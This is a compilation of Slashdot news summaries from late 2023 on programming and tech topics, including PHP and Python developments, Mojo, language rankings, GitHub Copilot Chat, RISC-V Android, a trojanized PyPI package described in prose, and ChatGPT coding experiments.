Slashdot reader sysadminafterdark writes: Released on November 26, 2020, PHP 8 brought many optimizations and powerful features to the language.Fast forward to today, and PHP 8 is getting the boot in favor of 8.1, 8.2, and 8.3 with 8.4 in development. This leaves some websites at risk of breaking and potential security issues. Hearing of this news, I upgraded my own blog and wrote an article on how to add the Remi repository and update. I run Enterprise Linux (The best distro out there) so if you are standing up new boxes, just keep in mind the PHP in the repo is deprecated.

Long-time Slashdot reader destinyland writes: The Linux Foundation recently funded a new "security developer in residence" position for Python. (It's funded through the Linux Foundation's own "Open Software Security foundation", which has a stated mission of partnering with open source project maintainers "to systematically find new, as-yet-undiscovered vulnerabilities in open source code, and get them fixed to improve global software supply chain security.") The position went to the lead maintainer for the HTTP client library urllib3, the most downloaded package on the Python Package Index with over 10 billion downloads. But he hopes to create a ripple effect by demonstrating the impact of security investments in critical communities — ultimately instigating a wave of improvements to all software supply chains. (And he's also documenting everything for easy replication by other communities...)

So far he's improved the security of Python's release processes with signature audits and security-hardening automation. But he also learned that CVE numbers were being assigned to newly-discovered vulnerabilities by the National Cyber Security Division of the America's Department of Homeland Security — often without talking to anyone at the Python project. So by August he'd gotten the Python Software Foundation authorized as a CVE Numbering Authority, which should lead to more detailed advisories (including remediation information), now reviewed and approved by Python's security response teams.

"The Python Software wants to help other Open Source organizations, and will be sharing lessons learned," he writes in a blog post. And he now says he's already been communicating with the Curl program about his experiences to help them take the same step, and even authored a guide to the process for other open source projects.

GameMaker announced that it will be free to use for noncommercial, non-console projects, breaking away from Unity and its massive pricing controversy that saw game developers boycotting the engine. The company is also "eliminating its indie / creator tier monthly subscription fee in favor of a one-time paid licensing fee of $99," reports The Verge. "Additionally, if you're currently enrolled at the indie / creator tier and wish to pay the licensing fee, the subscription fees you've paid will be discounted from the price." The Verge: Russell Kay, head of GameMaker, said that the changes were a way for the company to express its thanks to users, explaining that, since 2021, GameMaker has seen its user base triple in size. Kay also had some subtle but effective shade for GameMaker's competitors. "We have seen other platforms making awkward moves with their pricing and terms, so we thought, what if we did the opposite, something that could actually be good for developers?" Kay wrote in the announcement.

Though customers currently enrolled in an enterprise-level subscription will see no changes to their plans, it seems like GameMaker is counting on the pricing update to draw more people to the software. "Our success is measured by the number of people making games!" Kay wrote.

Python "come with downsides," argues a new article in Communications of the ACM. "Its programs tend to run slowly, and because it is inefficient at running processes in parallel, it is not well suited to some of the latest AI programming."

"Hoping to overcome those difficulties, computer scientist Chris Lattner set out to create a new language, Mojo, which offers the ease of use of Python, but the performance of more complex languages such as C++ or Rust." Lattner tells the site "we don't want to break Python, we want to make Python better," while software architect Doug Meil says Mojo is essentially "Python for AI... and it's going to be way faster in scale across multiple hardware platforms." Lattner teamed up with Tim Davis, whom he had met when they both worked for Google, to form Modular in January 2022. The company, where Lattner is chief executive officer and Davis chief product officer, provides support for companies working on AI and is developing Mojo.

A modern AI programming stack generally has Python on top, Lattner says, but because that is an inefficient language, it has C++ underneath to handle the implementation. The C++ then must communicate with performance accelerators or GPUs, so developers add a platform such as Compute Unified Device Architecture (CUDA) to make efficient use of those GPUs. "Mojo came from the need to unify these three different parts of the stack so that we could build a unified solution that can scale up and down," Lattner says. The result is a language with the same syntax as Python, so people used to programming in Python can adopt it with little difficulty, but which, by some measures, can run up to 35,000 times faster. For AI, Mojo is especially fast at performing the matrix multiplications used in many neural networks because it compiles the multiplication code to run directly on the GPU, bypassing CUDA...

"Increasingly, code is not being written by computer programmers. It's being written by doctors and journalists and chemists and gamers," says Jeremy Howard, an honorary professor of computer science at the University of Queensland, Australia, and a co-founder of fast.ai, a. "All data scientists write code, but very few data scientists would consider themselves professional computer programmers." Mojo attempts to fill that need by being a superset of Python. A program written in Python can be copied into Mojo and will immediately run faster, the company says. The speedup comes from a variety of factors. For instance, Mojo, like other modern languages, enables threads, small tasks that can be run simultaneously, rather than in sequence. Instead of using an interpreter to execute code as Python does, Mojo uses a compiler to turn the code into assembly language.

Mojo also gives developers the option of using static typing, which defines data elements and reduces the number of errors... "Static behavior is good because it leads to performance," Lattner says. "Static behavior is also good because it leads to more correctness and safety guarantees."
Python creator Guido van Rossum "says he is interested to watch how Mojo develops and whether it can hit the lofty goals Lattner is setting for it..." according to the article, " but he emphasizes that the language is in its early stages and, as of July 2023, Mojo had not yet been made available for download."


In June, Lattner did an hour-long interview with the TWIML AI podcast. And in 2017 Chris Lattner answered questions from Slashdot's readers.

An anonymous reader shared this report from InfoWorld: JetBrains' Kotlin language, a Java rival endorsed by Google for Android mobile development, continues to scale up Tiobe's index of language popularity, reaching the 15th spot in the November 2023 rankings...

Software quality services company Tiobe cites Kotlin advantages including interoperability with Java and unrivaled Android accommodations as reasons for the language's rise. Kotlin, Tiobe CEO Paul Jansen said, also fits in with a modern programming culture of expressive languages that have a strong type system and avoid null pointer exceptions by design. "Based on my experience, I am pretty sure Kotlin can reach a top 10 position," Jansen said. It remains to be seen if it can ever scale as high as a top four slot, he added...

In the rival Pypl Popularity of Programming languages index this month, Kotlin was ranked 13th with a 1.76% share, having slipped slightly year-over-year.
Kotlin's rank on the TIOBE index rose three positions in the last month — after rising two positions the month before. TIOBE's CEO says the language has now achieved its highest ranking ever on the index, surpassing 2017's "first wave of Kotlin popularity...when Google announced first class support for Kotlin on Android."

Rust now ranks #20 on the index, behind Delphi/Object Pascal, Swift, Ruby, and R.

Here's TIOBE November rankings for top-20 most popular programming languages:

1. Python
2. C
3. C++
4. Java
5. C#
6. JavaScript
7. PHP
8. Visual Basic
9. SQL
10. Assembly Language
11. Scratch
12. Fortran
13. Go
14. MATLAB
15. Kotlin
16. Delphi/Object Pascal
17. Swift
18. Ruby
19. R
20. Rust

The Python community is staying busy.

• Three weeks ago a new podcast launched with Python core developer/steering council member Pablo Galindo and Python developer-in-residence Åukasz Langa.

• This month the Python Sofware Foundation announced its seventh Python Developers Survey.

• And for the fifth year in a row the foundation partnered with JetBrains to offer a 30% discount on JetBrains' dedicated Python Integrated Development Environment "PyCharm" — with all proceeds benefitting the Python Software Foundation ("The discount will be automatically applied when you check out. The promotion will only be available through November 27th...")
  
  A PSF blog post about the fundraiser notes you can also just make a direct donation to the Python Software Foundation, or sign up to become a foundation member to "help us sustain what we do."

An anonymous reader quotes a report from The Intercept: A joint project of Human Rights Watch and New York University to document human rights abuses in the Democratic Republic of the Congo has been taken offline after exposing the identities of thousands of vulnerable people, including survivors of mass killings and sexual assaults. The Kivu Security Tracker is a "data-centric crisis map" of atrocities in eastern Congo that has been used by policymakers, academics, journalists, and activists to "better understand trends, causes of insecurity and serious violations of international human rights and humanitarian law," according to the deactivated site. This includes massacres, murders, rapes, and violence against activists and medical personnel by state security forces and armed groups, the site said. But the KST's lax security protocols appear to have accidentally doxxed up to 8,000 people, including activists, sexual assault survivors, United Nations staff, Congolese government officials, local journalists, and victims of attacks, an Intercept analysis found. Hundreds of documents -- including 165 spreadsheets -- that were on a public server contained the names, locations, phone numbers, and organizational affiliations of those sources, as well as sensitive information about some 17,000 "security incidents," such as mass killings, torture, and attacks on peaceful protesters.

The data was available via KST's main website, and anyone with an internet connection could access it. The information appears to have been publicly available on the internet for more than four years. [...] The spreadsheets, along with the main KST website, were taken offline on October 28, after investigative journalist Robert Flummerfelt, one of the authors of this story, discovered the leak and informed Human Rights Watch and New York University's Center on International Cooperation. HRW subsequently assembled what one source close to the project described as a "crisis team." Last week, HRW and NYU's Congo Research Group, the entity within the Center on International Cooperation that maintains the KST website, issued a statement that announced the takedown and referred in vague terms to "a security vulnerability in its database," adding, "Our organizations are reviewing the security and privacy of our data and website, including how we gather and store information and our research methodology." The statement made no mention of publicly exposing the identities of sources who provided information on a confidential basis. [...] The Intercept has not found any instances of individuals affected by the security failures, but it's currently unknown if any of the thousands of people involved were harmed. "We deeply regret the security vulnerability in the KST database and share concerns about the wider security implications," Human Rights Watch's chief communications officer, Mei Fong, told The Intercept. Fong said in an email that the organization is "treating the data vulnerability in the KST database, and concerns around research methodology on the KST project, with the utmost seriousness." Fong added, "Human Rights Watch did not set up or manage the KST website. We are working with our partners to support an investigation to establish how many people -- other than the limited number we are so far aware of -- may have accessed the KST data, what risks this may pose to others, and next steps. The security and confidentiality of those affected is our primary concern."

Despite more than a decade of reminding, prodding, and downright nagging, a surprising number of developers still can't bring themselves to keep their code free of credentials that provide the keys to their kingdoms to anyone who takes the time to look for them. From a report: The lapse stems from immature coding practices in which developers embed cryptographic keys, security tokens, passwords, and other forms of credentials directly into the source code they write. The credentials make it easy for the underlying program to access databases or cloud services necessary for it to work as intended. [...]

The number of studies published since following the revelations underscored just how common the practice had been and remained in the years immediately following Uber's cautionary tale. Sadly, the negligence continues even now. Researchers from security firm GitGuardian this week reported finding almost 4,000 unique secrets stashed inside a total of 450,000 projects submitted to PyPI, the official code repository for the Python programming language. Nearly 3,000 projects contained at least one unique secret. Many secrets were leaked more than once, bringing the total number of exposed secrets to almost 57,000.

Programmer and writer James Somers, writing for New Yorker: Yes, our jobs as programmers involve many things besides literally writing code, such as coaching junior hires and designing systems at a high level. But coding has always been the root of it. Throughout my career, I have been interviewed and selected precisely for my ability to solve fiddly little programming puzzles. Suddenly, this ability was less important.

I had gathered as much from Ben (friend of the author), who kept telling me about the spectacular successes he'd been having with GPT-4. It turned out that it was not only good at the fiddly stuff but also had the qualities of a senior engineer: from a deep well of knowledge, it could suggest ways of approaching a problem. For one project, Ben had wired a small speaker and a red L.E.D. light bulb into the frame of a portrait of King Charles, the light standing in for the gem in his crown; the idea was that when you entered a message on an accompanying Web site the speaker would play a tune and the light would flash out the message in Morse code. (This was a gift for an eccentric British expat.) Programming the device to fetch new messages eluded Ben; it seemed to require specialized knowledge not just of the microcontroller he was using but of Firebase, the back-end server technology that stored the messages. Ben asked me for advice, and I mumbled a few possibilities; in truth, I wasn't sure that what he wanted would be possible. Then he asked GPT-4. It told Ben that Firebase had a capability that would make the project much simpler. Here it was -- and here was some code to use that would be compatible with the microcontroller.

Afraid to use GPT-4 myself -- and feeling somewhat unclean about the prospect of paying OpenAI twenty dollars a month for it -- I nonetheless started probing its capabilities, via Ben. We'd sit down to work on our crossword project, and I'd say, "Why don't you try prompting it this way?" He'd offer me the keyboard. "No, you drive," I'd say. Together, we developed a sense of what the A.I. could do. Ben, who had more experience with it than I did, seemed able to get more out of it in a stroke. As he later put it, his own neural network had begun to align with GPT-4's. I would have said that he had achieved mechanical sympathy. Once, in a feat I found particularly astonishing, he had the A.I. build him a Snake game, like the one on old Nokia phones. But then, after a brief exchange with GPT-4, he got it to modify the game so that when you lost it would show you how far you strayed from the most efficient route. It took the bot about ten seconds to achieve this. It was a task that, frankly, I was not sure I could do myself.

In chess, which for decades now has been dominated by A.I., a player's only hope is pairing up with a bot. Such half-human, half-A.I. teams, known as centaurs, might still be able to beat the best humans and the best A.I. engines working alone. Programming has not yet gone the way of chess. But the centaurs have arrived. GPT-4 on its own is, for the moment, a worse programmer than I am. Ben is much worse. But Ben plus GPT-4 is a dangerous thing.

Started in 2013, "Hour of Code" is an annual tradition started by the education non-profit Code.org (which provides free coding lessons to schools). Its FAQ describes the December event for K-12 students as "a worldwide effort to celebrate computer science, starting with 1-hour coding activities," and over 100 million schoolkids have participated over the years.

This year's theme will be "Creativity With AI," and the "computer vision" lesson includes a short video (less than 7 minutes) featuring a Tesla Autopilot product manager from its computer vision team. "I build self-driving cars," they say in the video. "Any place where there can be resources used more efficiently I think is a place where technology can play a role. But of course one of the best, impactful ways of AI, I hope, is through self-driving cars." (The video then goes on to explain how lots of training data ultimately generates a statistical model, "which is just a fancy way of saying, a guessing machine.")

The 7-minute video is part of a larger lesson plan (with a total estimated time of 45 minutes) in which students tackle a fun story problem. If a sports arena's scoreboard is showing digital numbers, what series of patterns would a machine-vision system have to recognize to identify each digit. (Students are asked to collaborate in groups.) And it's just one of seven 45-minute lessons, each one accompanied by a short video. (The longest video is 7 minutes and 28 seconds, and all seven videos, if watched back-to-back, would run for about 31 minutes.)

Not all the lessons involve actual coding, but the goal seems to be familiarizing students (starting at the 6th grade level) with artificial intelligence of today, and the issues it raises. The second-to-last lesson is titled "Algorithmic Bias" — with a video including interviews with an ethicist at Open AI and professor focused on AI from both MIT and Stanford. And the last lesson — "Our AI Code of Ethics" — challenges students to assemble documents and videos on AI-related "ethical pitfalls," and then pool their discoveries into an educational resource "for AI creators and legislators everywhere."

This year's installment is being billed as "the largest learning event in history." And it's scheduled for the week of December 4 so it coincides with "Computer Science Education Week" (a CS-education event launched in 2009 by the Association for Computing Machinery, with help from partners including Intel, Microsoft, Google, and the National Science Foundation).

The senior security editor at Ars Technica writes: Highly invasive malware targeting software developers is once again circulating in Trojanized code libraries, with the latest ones downloaded thousands of times in the last eight months, researchers said Wednesday.

Since January, eight separate developer tools have contained hidden payloads with various nefarious capabilities, security firm Checkmarx reported. The most recent one was released last month under the name "pyobfgood." Like the seven packages that preceded it, pyobfgood posed as a legitimate obfuscation tool that developers could use to deter reverse engineering and tampering with their code. Once executed, it installed a payload, giving the attacker almost complete control of the developerâ(TM)s machine. Capabilities include:


- Exfiltrate detailed host information
- Steal passwords from the Chrome web browser
- Set up a keylogger
- Download files from the victim's system
- Capture screenshots and record both screen and audio
- Render the computer inoperative by ramping up CPU usage, inserting a batch script in the startup directory to shut down the PC, or forcing a BSOD error with a Python script
- Encrypt files, potentially for ransom
- Deactivate Windows Defender and Task Manager
- Execute any command on the compromised host


In all, pyobfgood and the previous seven tools were installed 2,348 times. They targeted developers using the Python programming language... Downloads of the package came primarily from the US (62%), followed by China (12%) and Russia (6%)
Ars Technica concludes that "The never-ending stream of attacks should serve as a cautionary tale underscoring the importance of carefully scrutinizing a package before allowing it to run."

In Chrome, JavaScript (and WebAssembly) code are both executed by Google's open source V8 engine — which already has garbage-collecting capabilities. "This means developers making use of, for example, PHP compiled to Wasm, end up shipping a garbage collector implementation of the ported language (PHP) to the browser that already has a garbage collector," writes Google developer advocate Thomas Steiner, "which is as wasteful as it sounds."

"This is where WasmGC comes in." WebAssembly Garbage Collection (or WasmGC) is a proposal of the WebAssembly Community Group [which] adds struct and array heap types, which means support for non-linear memory allocation... In simplified terms, this means that with WasmGC, porting a programming language to WebAssembly means the programming language's garbage collector no longer needs to be part of the port, but instead the existing garbage collector can be used.
Sometime on Halloween, Steiner wrote that in Chrome, WebAssembly garbage collection is now enabled by default. But then he explored what this means for high-level programming languages (with their own built-in garbage collection) being compiled into WebAssembly: To verify the real-world impact of this improvement, Chrome's Wasm team has compiled versions of the Fannkuch benchmark (which allocates data structures as it works) from C, Rust, and Java. The C and Rust binaries could be anywhere from 6.1 K to 9.6 K depending on the various compiler flags, while the Java version is much smaller at only 2.3 K! C and Rust do not include a garbage collector, but they do still bundle malloc/free to manage memory, and the reason Java is smaller here is because it doesn't need to bundle any memory management code at all. This is just one specific example, but it shows that WasmGC binaries have the potential of being very small, and this is even before any significant work on optimizing for size.
The blog post includes two examples of WasmGC-ported programming languages in action:

• "One of the first programming languages that has been ported to Wasm thanks to WasmGC is Kotlin in the form of Kotlin/Wasm."

• "The Dart and Flutter teams at Google are also preparing support for WasmGC. The Dart-to-Wasm compilation work is almost complete, and the team is working on tooling support for delivering Flutter web applications compiled to WebAssembly."

This week GitHub announced the approaching general availability of the GPT-4-powered GitHub Copilot Chat in December "as part of your existing GitHub Copilot subscription" (and "available at no cost to verified teachers, students, and maintainers of popular open source projects.")

And this "code-aware guidance and code generation" will also be integrated directly into github.com, "so developers can dig into code, pull requests, documentation, and general coding questions with Copilot Chat providing suggestions, summaries, analysis, and answers." With GitHub Copilot Chat we're enabling the rise of natural language as the new universal programming language for every developer on the planet. Whether it's finding an error, writing unit tests, or helping debug code, Copilot Chat is your AI companion through it all, allowing you to write and understand code using whatever language you speak...

Copilot Chat uses your code as context, and is able to explain complex concepts, suggest code based on your open files and windows, help detect security vulnerabilities, and help with finding and fixing errors in code, terminal, and debugger...

With the new inline Copilot Chat, developers can chat about specific lines of code, directly within the flow of their code and editor.
InfoWorld notes it will chat in "whatever language a developer speaks." (And that Copilot Chat will also be available in GitHub's mobile app.) But why wait until December? GitHub's blog post says that Copilot Chat "will come to the JetBrains suite of IDEs, available in preview today."

GitHub also plans to introduce "slash commands and context variables" for GitHub Copilot, "so fixing or improving code is as simple as entering /fix and generating tests now starts with /tests."

"With Copilot in the code editor, in the CLI, and now Copilot Chat on github.com and in our mobile app, we are making Copilot ubiquitous throughout the software development lifecycle and always available in all of GitHub's surface areas..."

CNBC adds that "Microsoft-owned GitHub" also plans to introduce "a more expensive Copilot assistant" in February "for developers inside companies that can explain and provide recommendations about internal source code."

Wednesday's blog post announcing these updates was written by GitHub's CEO, who seemed to be predicting an evolutionary leap into a new future. "Just as GitHub was founded on Git, today we are re-founded on Copilot." He promised they'd built on their vision of a future "where AI infuses every step of the developer lifecycle." Open source and Git have fundamentally transformed how we build software. It is now evident that AI is ushering in the same sweeping change, and at an exponential pace... We are certain this foundational transformation of the GitHub platform, and categorically new way of software development, is necessary in a world dependent on software. Every day, the world's developers balance an unsustainable demand to both modernize the legacy code of yesterday and build our digital tomorrow. It is our guiding conviction to make it easier for developers to do it all, from the creative spark to the commit, pull request, code review, and deploy — and to do it all with GitHub Copilot deeply integrated into the developer experience.
And if you're worried about the security of AI-generated code... Today, GitHub Copilot applies an LLM-based vulnerability prevention system that blocks insecure coding patterns in real-time to make GitHub Copilot's suggestions more secure. Our model targets the most common vulnerable coding patterns, including hardcoded credentials, SQL injections, and path injections. GitHub Copilot Chat can also help identify security vulnerabilities in the IDE, explain the mechanics of a vulnerability with its natural language capabilities, and suggest a specific fix for the highlighted code.
But for Enterprise accounts paying for GitHub Advanced Security, there's also an upgrade coming: "new AI-powered application security testing features designed to detect and remediate vulnerabilities and secrets in your code." (It's already available in preview mode.)

GitHub even announced plans for a new AI assistant in 2024 that generates a step-by-step plan for responding to GitHub issues. (GitHub describes it as "like a pair programming session with a partner that knows about every inch of the project, and can follow your lead to make repository-wide changes from the issue to the pull request with the power of AI.")

CNBC notes that AI-powered coding assistants "are still nascent, though, with less than 10% enterprise adoption, according to Gartner, a technology industry research firm."

But last month Microsoft CEO Satya Nadella told analysts GitHub Copilot already had one million paying users...

And GitHub's blog post concludes, "And we're just getting started."

With programmers in high demand, InfoWorld asks if it's really worthwhile for software developers to pursue certifications? "Based on input from those in the field, company executives, and recruiters, the answer is a resounding yes," "The primary benefit of certifications is to verify your skill sets," says Archie Payne, president of the recruiting firm CalTek Staffing... Certifications can be used to "reinforce the experience on your resume or demonstrate competencies beyond what you've done in the workplace in a prior role." Certifications show that you are committed to your field, invested in career growth, and connected to the broader technology landscape, Payne says. "Obtaining certification indicates that you are interested in learning new skills and continuing your learning throughout your career," he says...

In cases where multiple candidates are equally qualified, having a relevant certification can give one candidate an edge over others, says Aleksa Krstic, CTO at Localizely, a provider of a cloud-based translation platform. "When it comes to certifications in general, when we see a junior to mid-level developer armed with programming certifications, it's a big green light for our hiring team," says MichaÅ Kierul, who is CEO of software company INTechHouse.

"It's not just about the knowledge they have gained," Kierul says. "It speaks volumes about their passion, their drive to excel, and their commitment to continuous learning outside their regular work domain. It underscores a key trait we highly value: the desire to grow, learn, and elevate oneself in the world of technology."

An anonymous reader quotes a report from Ars Technica: Android is slowly entering the RISC-V era. So far we've seen Google say it wants to give the up-and-coming CPU architecture "tier-1" support in Android, putting RISC-V on equal footing with Arm. Qualcomm has announced the first mass-market RISC-V Android chip, a still-untitled Snapdragon Wear chip for smartwatches. Now Google has announced a timeline for developer tools via the Google Open Source Blog. The last post is titled "Android and RISC-V: What you need to know to be ready."

Getting the Android OS and app ecosystem to support a new architecture is going to take an incredible amount of work from Google and developers, and these tools are laying the foundation for that work. First up, Google already has the "Cuttlefish" virtual device emulator running, including a gif of it booting up. This isn't the official "Android Emulator" -- which is targeted at app developers doing app development -- Cuttlefish is a hardware emulator for Android OS development. It's the same idea as the Android Emulator but for the bottom half of the tech stack -- the kernel, framework, and hardware bits. Cuttlefish lets Google and other Android OS contributors work on a RISC-V Android build without messing with an individual RISC-V device. Google says it's working well enough now that you can download and emulate a RISC-V device today, though the company warns that nothing is optimized yet.

The next step is getting the Android Emulator (for app developers) up and running, and Google says: "By 2024, the plan is to have emulators available publicly, with a full feature set to test applications for various device form factors!" The nice thing about Android is that most app code is written with no architecture in mind -- it's all just Java/Kotlin. So once the Android RunTime starts spitting out RISC-V code, a lot of app code should Just Work. That means most of the porting work will need to go into things written in the NDK, the native developer kit, like libraries and games. The emulator will still be great for testing, though.

"More developers are looking for or are open to a new job now compared to the last two years," writes Stack Overflow's senior analyst for market research and insights — citing the results of their latest survey of developers in 107 different countries.

"More than 1,000 developers responded to this year's survey about jobs and 79% are at least considering new opportunities if not actively looking." New insights from these survey results show that new tech talent and late-career developers are both more likely to be looking. New developers have increasingly switched jobs compared to early- and mid-career developers in the last three years... Interest in looking for a new job drops as developers get older for new to mid-career (44 and younger) respondents (86% to 74%), but picks back up for those 55 to 64 (88%). Late-career developers acknowledge curiosity about other companies as their second top reason to look for a new job this year behind "better salary," which all age groups rank as their top reason. Curiosity grew in importance for late-career developers since last year more than all other age groups (32% vs. 22%) and is more important to this group than reasons other groups ranked higher such as working with new technology and growth opportunities...

In our 2023 Developer Survey, we started asking about AI and the sentiment around it in our developer community; results were very similar when we checked in again through this pulse survey (70% are using AI or planning to). Developers may also feel less enthusiastic about learning opportunities now that AI tools are rapidly developing to help many be more productive in their jobs (30% cite this as the top benefit).
Other interesting findings from the survey:

• Compared to the 2023 Developer Survey, 8% of developers have exited the technology industry and are increasingly filling roles in manufacturing and supply chain companies (11% vs. 7%)

• Technology is the industry most developers currently work in (46%), followed by manufacturing/supply chain (14%) and financial services (13%)

• New tech talent is onboarding at as many jobs by 24 as those up to 10 years their senior and this rapid experience cycle could rival the knowledge and experience of those they report to.

Long-time Slashdot reader CJSHayward shares "an attempt at Python virtual shell."

The home-brewed project "mixes your native shell with Python with the goal of letting you use your regular shell but also use Python as effectively a shell scripting language, as an alternative to your shell's built-in scripting language... I invite you to explore and improve it!"

From the web site: The Python Virtual Shell (pvsh or 'p' on the command line) lets you mix zsh / bash / etc. built-in shell scripting with slightly modified Python scripting. It's kind of like Brython [a Python implementation for client-side web programming], but for the Linux / Unix / Mac command line...

The core concept is that all Python code is indented with tabs, with an extra tab at the beginning to mark Python code, and all shell commands (including some shell builtins) have zero tabs of indentation. They can be mixed line-by-line, offering an opportunity to use built-in zsh, bash, etc. scripting or Python scripting as desired.

The Python is an incomplete implementation; it doesn't support breaking a line into multiple lines. Nonetheless, this offers a tool to fuse shell- and Python-based interactions from the Linux / Unix / Mac command line.

theodp writes: The BBC reports that Pope Francis has endorsed a global project aimed at getting more children into computer programming. The Code with Pope initiative, championed by Cosmose AI founder Miron Mironiuk, aims to bridge "the glaring disparities in education" across the globe by providing access to Python coding education through the free online learning platform Codeforia for students aged 11-15 across Europe, Africa and Latin America. Mironiuk will meet the Pope at the Vatican, but he admits he's not anticipating the pontiff to emulate his students in acquiring new skills. "I don't expect him to know Python very well," he said.

This is not the first time the Pope has encouraged young people to get into coding, having helped write a line of code together with tech-backed nonprofit Code.org in 2019. Pope Francis has also blessed AI's potential for good, meeting with Microsoft President Brad Smith (a Code.org Board member) to sign the Rome Call for AI Ethics early this year just ahead of Microsoft's $10B OpenAI investment and announcing "Artificial Intelligence and Peace" as the theme for World Day of Peace 2024 in August.

An anonymous reader quotes a report from Tom's Hardware: SiFive, one of the key companies in the RISC-V ecosystem, is undergoing a significant restructuring marked by extensive layoffs and apparently a shift in business focus, reports More Than Moore. The company is seemingly retracting from its pre-designed core offerings, which means it may focus on custom cores instead. Meanwhile, the move casts uncertainty over SiFive's future in general along with its contributions to the RISC-V.

RISC-V has become quite a popular choice for making miniature low-cost cores, but there are several companies who are working on higher-performance RISC-V-based offerings. SiFive is one of such companies offering ready-to-use designs and also making custom cores based on what customers need. But now, SiFive has laid off somewhere between 100 to over 300 employees from around 700 in mid-October. Most of these were engineers, along with some sales and product personnel. Meanwhile, the company's leaders, including CEO Patrick Little, are still there. SiFive issued the following statement to Tom's Hardware: "As we identify and focus on our greatest opportunities, SiFive is shifting to best meet our customers' fast-changing requirements by undergoing a strategic refocusing of all our global teams. Unfortunately, with this realignment, approximately 20% of employees across all different business groups and levels were impacted. The employees are receiving severance and outplacement assistance.

SiFive continues to be excited about the long-term opportunities for the company and for RISC-V. The growth of the company has never been stronger and the opportunities never better. We are well funded for years in the future and continue to work with the market leaders in every segment. We remain focused on our four product groups, essential, intelligence, performance and automotive, and as we explained in a press event earlier this month, have a robust roadmap to meet the needs of these markets. We see tremendous new opportunities in AI and with Consumer products like wearables and mobile as Google brings Android to the RISC-V ecosystem. We will continue to offer customization for specific customers, offering standard and custom products where it makes sense from a business standpoint."

An anonymous reader quotes a report from 404 Media: Immigration and Customs Enforcement (ICE) has used a system called Giant Oak Search Technology (GOST) to help the agency scrutinize social media posts, determine if they are "derogatory" to the U.S., and then use that information as part of immigration enforcement, according to a new cache of documents reviewed by 404 Media. The documents peel back the curtain on a powerful system, both in a technological and a policy sense -- how information is processed and used to decide who is allowed to remain in the country and who is not.

GOST's catchphrase included in one document is "We see the people behind the data." A GOST user guide included in the documents says GOST is "capable of providing behavioral based internet search capabilities." Screenshots show analysts can search the system with identifiers such as name, address, email address, and country of citizenship. After a search, GOST provides a "ranking" from zero to 100 on what it thinks is relevant to the user's specific mission. The documents further explain that an applicant's "potentially derogatory social media can be reviewed within the interface." After clicking on a specific person, analysts can review images collected from social media or elsewhere, and give them a "thumbs up" or "thumbs down." Analysts can also then review the target's social media profiles themselves too, and their "social graph," potentially showing who the system believes they are connected to.

DHS has used GOST since 2014, according to a page of the user guide. In turn, ICE has paid Giant Oak Inc., the company behind the system, in excess of $10 million since 2017, according to public procurement records. A Giant Oak and DHS contract ended in August 2022, according to the records. Records also show Customs and Border Protection (CBP), the Drug Enforcement Administration (DEA), the State Department, the Air Force, and the Bureau of the Fiscal Service which is part of the U.S. Treasury have all paid for Giant Oak services over the last nearly ten years. The FOIA documents specifically discuss Giant Oak's use as part of an earlier 2016 pilot called the "HSI [Homeland Security Investigations] PATRIOT Social Media Pilot Program." For this, the program would "target potential overstay violators from particular visa issuance Posts located in countries of concern." "The government should not be using algorithms to scrutinize our social media posts and decide which of us is 'risky.' And agencies certainly shouldn't be buying this kind of black box technology in secret without any accountability. DHS needs to explain to the public how its systems determine whether someone is a 'risk' or not, and what happens to the people whose online posts are flagged by its algorithms," Patrick Toomey, Deputy Director of the ACLU's National Security Project, told 404 Media in an email. The documents come from a Freedom of Information Act (FOIA) lawsuit brought by both the ACLU and the ACLU of Northern California. Toomey from the ACLU then shared the documents with 404 Media.

theodp writes: In July, Seattle-based and tech-backed nonprofit Code.org announced its 10th policy recommendation for all states "to require all students to take computer science (CS) to earn a high school diploma." In August, Washington State Senator Lisa Wellman phoned-in her plans to introduce a bill to make computer science a Washington high school graduation requirement to the state's Board of Education, indicating that the ChatGPT-sparked AI craze and Code.org had helped convince her of the need. Wellman, a former teacher who worked as a Programmer/System Analyst in the 80's before becoming an Apple VP (Publishing) in the '90s, also indicated that exposure to CS given to students in fifth grade could be sufficient to satisfy a HS CS requirement. In 2019, Wellman sponsored Microsoft-supported SB 5088 (Bill details), which required all Washington state public high schools to offer a CS class. Wellman also sponsored SB 5299 in 2021, which allows high school students to take a computer science elective in place of a third year math or science course (that may be required for college admission) to count towards graduation requirements.

And in October, Code.org CEO Hadi Partovi appeared before the Washington State Board of Education, driving home points Senator Wellman made in August with a deck containing slides calling for Washington to "require that all students take computer science to earn a high school diploma" and to "require computer science within all teacher certifications." Like Wellman, Partovi suggested the CS high school requirement might be satisfied by middle school work (he alternatively suggested one year of foreign language could be dropped to accommodate a HS CS course). Partovi noted that Washington contained some of the biggest promoters of K-12 CS in Microsoft Philanthropies' TEALS (TEALS founder Kevin Wang is a member of the Washington State Board of Education) and Code.org, as well some of the biggest funders of K-12 CS in Amazon and Microsoft -- both which are $3,000,000+ Platinum Supporters of Code.org and have top execs on Code.org's Board of Directors.

Coding help forum Stack Overflow is laying off 28 percent of its staff as it struggles toward profitability. From a report: CEO Prashanth Chandrasekar announced today that the company is "significantly reducing the size of our go-to-market organization," as well as "supporting teams" and other groups. After the team doubled its employee base last year, Chandrasekar told The Verge's Nilay Patel in an interview that about 45 percent of those hires were for its go-to-market sales team, which he said was "obviously the largest team." Prosus acquired Stack Overflow in a $1.8 billion deal in mid-2021.

ZDNet's senior contributing editor also maintains software, and recently tested ChatGPT on two fixes for bugs reported by users, and a new piece of code to add a new feature, It's a "real-world" coding test, "about pulling another customer support ticket off the stack and working through what made the user's experience go south." First...

please rewrite the following code to change it from allowing only integers to allowing dollars and cents (in other words, a decimal point and up to two digits after the decimal point). ChatGPT responded by explaining a two-step fix, posting the modified code, and then explaining the changes. "I dropped ChatGPT's code into my function, and it worked. Instead of about two-to-four hours of hair-pulling, it took about five minutes to come up with the prompt and get an answer from ChatGPT." Next up was reformatting an array. I like doing array code, but it's also tedious. So, I once again tried ChatGPT. This time the result was a total failure. By the time I was done, I probably fed it 10 different prompts. Some responses looked promising, but when I tried to run the code, it errored out. Some code crashed; some code generated error codes. And some code ran, but didn't do what I wanted. After about an hour, I gave up and went back to my normal technique of digging through GitHub and StackExchange to see if there were any examples of what I was trying to do, and then writing my own code.
Then he posted the code for a function handling a Wordpress filter, along with the question: "I get the following error. Why?" Within seconds, ChatGPT responded... Just as it suggested, I updated the fourth parameter of the add_filter() function to 2, and it worked!

